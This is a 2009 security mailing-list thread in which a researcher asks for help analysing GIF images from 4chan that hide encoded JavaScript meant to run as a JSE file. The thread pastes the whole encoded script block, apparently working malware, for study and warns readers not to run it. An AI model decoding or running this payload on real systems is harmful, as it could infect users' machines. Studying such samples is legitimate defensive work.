Obfuscated Javascript in a JSE in an Image

[irongeek at irongeek.com (Adrian Crenshaw)]

Thanks, that helps, but I'd love to know what they used to obfuscate this.
I've seen a few schemes for obfuscate Javascript, and this one is the
fugliest I've encountered. I don't even understand how it can run.

On Sun, Feb 8, 2009 at 1:23 AM, Tim Mugherini <gbugbear at gmail.com> wrote:

> Adrian
>
> Dshield posted about this today
>
> May want to check in with them
>
> On 2/7/09, Adrian Crenshaw <irongeek at irongeek.com> wrote:
> > Ok, I found these images on 4chan that have encoded javascript in them,
> you
> > have to safe the gif as a jse to run them (but don't!!!, I'm just
> uploading
> > the images to a forum so you can see what they are). Exactly how is this
> > encoded, and can anyone tell what it does? This seems to be the script
> part:
> > GIF89aI    =    "x1!??";
> > #@~^pwkAAA==-mD~XtMP',x APzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@
> > #@&-lMPd4 VV~x,xnh,)1Yr7+or4N+1O`r jmMk2Oc?t sVr#i@#@&-lMP6/GPx~
> > +APz^Yb\np}4Ln^D`E?1.bwObxTRsbV jXkYn:}4%n1YJ*I@
> > #@&\lM~r+,',xnh~)1Yr\ pr(Ln^D`J(UD+.x
> > OA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r?Ji@#@&dt V^R^E.. xOfb.+1YG.HP'~WkW
> > o OUwn1kmVsKV9nDv bi@#@&d4 VVc.E    `J1h[PJm,mGwz~'JEP3~ UC
> > d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&J?Jp@
> #@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-w
> > bx[GS/-'/EMD+
> > O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv
> > #,Q~J'-kXdR%d Jbi@#@&8,mCO1t`nb,    N@#@&@#@&h4bV `F*PP~YMX~
> > @#@&@#@&,PP,atMRWanU`ro YE~~E4YOw=&zb:L
> > WmtCUcW.oJ8JJS,!*i@#@&J?rI@#@&P~P,64.c/+D]+$E+kOu+mN DcJ(W
> > HGNbWk NRjbxmnEBPU+S~GlO `Z##p@#@&~P,PatMRdn    N`*I@
> > #@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@
> > #@&~P,P~P,Pa4MRWanxvJo
> > OE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_'
> > Rc#J#,FDS,!bi@#@&J?ri@#@&,PP~~,P~64.c/n    Nv#i@#@&,~P,P~P,\C.,k:,xP
> > +h,)^Yb\ (64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGN PxP2i@#@&,PP,~P,Pks
> > OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D
> > . /wKU/ AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL
> > Lknr~~y#p@#@&r?Jp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L
> > LknJ*i@#@&,PP~N,mCY14v+b,
> > )@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl
> > NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO
> > J~_,4[.HP_,E-M-x;GUY xDO9kd2K/rYbGx=PWGM:O[CDlIP    Cs+xri@
> > #@&@#@&P,~P7l.Pal.O8P',W/KRWanUK
> > 6DsrVncrXE~,+~,FbI@#@&J?EI@#@&~P,~al.DFchDbY ct l[P3PE.
> /YKwD'x-MwUJ,_,wCon
> > slOm4cz@!/2C    Pk[xrxGY4. l[v-9_#J#]qT,_~t l[~3PJ!20bV+p~Wk^+
> > lh+xCcor0'.-    -.w    J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY
> > ,x~0kWcW2+UP 6Osbs+vJ"EBP S~8#I@#@&E?ri@#@&P,PPalMO
> > ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GN wM-U'D'xD obdY'Dwx
> > OE~3P49.X,_PrRR-M-    Jbi@#@&,P~PaCDD  ^^W/nc*i@
> > #@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@
> #@&@#@&~~,P-lM~aWdDP{Px
> > h,)mDk-+or8% mYvEb9WN(
> > jYM+m:E#I@#@&J?Ei@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@
> #@&,~P,wWkO
> > Wa+    `bi@#@&,P~PaG/DRsGmNs.GssrV
> > crwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso
> > *1tlU KDLz(&r#I@#@&,PP,P,~P9W~    @#@&~~,PP,~P,PP,    jCc/^+nwcqZ!bi@
> > #@&J?ri@#@&,PP~~,P~8,A4ks Pvk+cD CNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@
> > #@&P,P~~,PPrncNGm!h
> xOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@
> #@&~,PP)~mmYm4cn#,
> > )@#@&@#@&E?ri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU
> > KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5E dDCnmN D`rZKUY
> > xOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE
> > NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+    NcwK/Obp@#@&@#@&P,PPqjuRkV +2`XTZ!T#p@
> > #@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@
> >
> > If you wan to see the gifs in question, look at this post:
> >
> > http://www.binrev.com/forums/index.php?showtopic=40285&hl=
> >
> >
> > Adrian
>
> --
> Sent from my mobile device
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090208/5b9561ed/attachment.htm